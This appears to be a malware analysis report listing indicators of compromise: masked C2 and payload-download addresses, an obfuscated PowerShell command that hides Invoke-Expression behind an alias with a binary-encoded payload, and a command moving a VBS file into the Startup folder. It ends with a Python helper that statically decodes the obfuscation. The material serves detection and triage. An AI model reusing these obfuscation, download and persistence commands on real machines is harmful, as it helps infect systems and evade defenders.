Technical Information
- %WINDIR%\microsoft.net\framework\v4.0.30319\regasm.exe
- '3.##.185.34':80
- 'em###o.ddns.net':5050
- http://3.##.185.34/bb3.jpg
- http://3.##.185.34/bb1.jpg
- DNS ASK google.com
- DNS ASK em###o.ddns.net
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $t0='DE5'.replace('D','I').replace('5','x');sal g $t0;$gf=(00100100,01000101,01110010,01110010,01101111,01110010,01000001,01100011,01110100,01101001,01101111,01101110,01010000,01110010,01100101...' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c move "<SYSTEM32>\<File name>.vbs" "<SYSTEM32>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $t0='DE5'.replace('D','I').replace('5','x');sal g $t0;$gf=(00100100,01000101,01110010,01110010,01101111,01110010,01000001,01100011,01110100,01101001,01101111,01101110,01010000,01110010,01100101...
- '<SYSTEM32>\cmd.exe' /c move "<SYSTEM32>\<File name>.vbs" "<SYSTEM32>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
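The PowerShell command line listed above uses two common obfuscation tricks: a string built by character substitution (`'DE5'.replace('D','I').replace('5','x')` yields `IEx`, which `sal g $t0` then hides behind the alias `g`), and a payload stored as a comma-separated list of 8-bit binary values. The script below is an added analyst helper, not code from the page or from the sample: it statically resolves the replace chain, follows the alias, and decodes the binary list as 8-bit ASCII (an assumption about how the truncated script consumes `$gf`; only the prefix visible on this page is embedded as the constructed sample, and the `...` tail is not reconstructed).

```python
import re

# Constructed sample: the visible prefix of the PowerShell command line from this
# report. The page truncates it with "...", so the tail is deliberately absent here.
SAMPLE_CMDLINE = (
    "$t0='DE5'.replace('D','I').replace('5','x');sal g $t0;"
    "$gf=(00100100,01000101,01110010,01110010,01101111,01110010,01000001,"
    "01100011,01110100,01101001,01101111,01101110,01010000,01110010,01100101..."
)

# $var='literal'.replace('a','b').replace('c','d')...
REPLACE_CHAIN = re.compile(r"\$(\w+)\s*=\s*'([^']*)'((?:\.replace\('[^']*','[^']*'\))+)")
REPLACE_CALL = re.compile(r"\.replace\('([^']*)','([^']*)'\)")
# sal <alias> $var  /  set-alias <alias> $var
SAL_ALIAS = re.compile(r"\b(?:sal|set-alias)\s+(\S+)\s+\$(\w+)", re.IGNORECASE)
# $var=(00100100,01000101,...)  -- closing paren optional so a truncated list still parses
OCTET_LIST = re.compile(r"\$(\w+)\s*=\s*\(((?:[01]{8}\s*,\s*)*[01]{8})")


def resolve_replace_chains(cmdline):
    """Evaluate 'literal'.replace(a,b).replace(c,d)... assignments without running them.
    Returns {variable: resolved string}."""
    resolved = {}
    for var, literal, chain in REPLACE_CHAIN.findall(cmdline):
        value = literal
        for old, new in REPLACE_CALL.findall(chain):
            # .NET String.Replace is an ordinal (case-sensitive) replace
            value = value.replace(old, new)
        resolved[var] = value
    return resolved


def resolve_aliases(cmdline, variables):
    """Map 'sal g $t0' style aliases to the command the variable resolves to."""
    return {alias: variables.get(var, "$" + var)
            for alias, var in SAL_ALIAS.findall(cmdline)}


def decode_octet_lists(cmdline):
    """Decode (00100100,01000101,...) lists as 8-bit ASCII. Assumption: the script
    later converts each value with [char]; the truncated tail is simply cut off."""
    decoded = {}
    for var, octets in OCTET_LIST.findall(cmdline):
        decoded[var] = "".join(chr(int(o, 2)) for o in re.split(r"\s*,\s*", octets))
    return decoded


def analyze(cmdline):
    """Static triage of one obfuscated PowerShell command line."""
    variables = resolve_replace_chains(cmdline)
    aliases = resolve_aliases(cmdline, variables)
    payloads = decode_octet_lists(cmdline)
    # Flag when any built string or alias target is Invoke-Expression's short form
    hides_iex = any(v.lower() == "iex"
                    for v in list(variables.values()) + list(aliases.values()))
    return {"variables": variables, "aliases": aliases,
            "payloads": payloads, "hides_iex": hides_iex}


if __name__ == "__main__":
    for key, value in analyze(SAMPLE_CMDLINE).items():
        print(f"{key}: {value}")
```

On the sample, the replace chain resolves `$t0` to `IEx`, the alias `g` therefore points at Invoke-Expression, and the visible binary values decode to the prefix `$ErrorActionPre` (the start of a `$ErrorActionPreference` assignment). The regexes are intentionally narrow to the syntax seen in this command line; a different sample with `-replace`, `[char]` casts or `-join` would need its own resolvers.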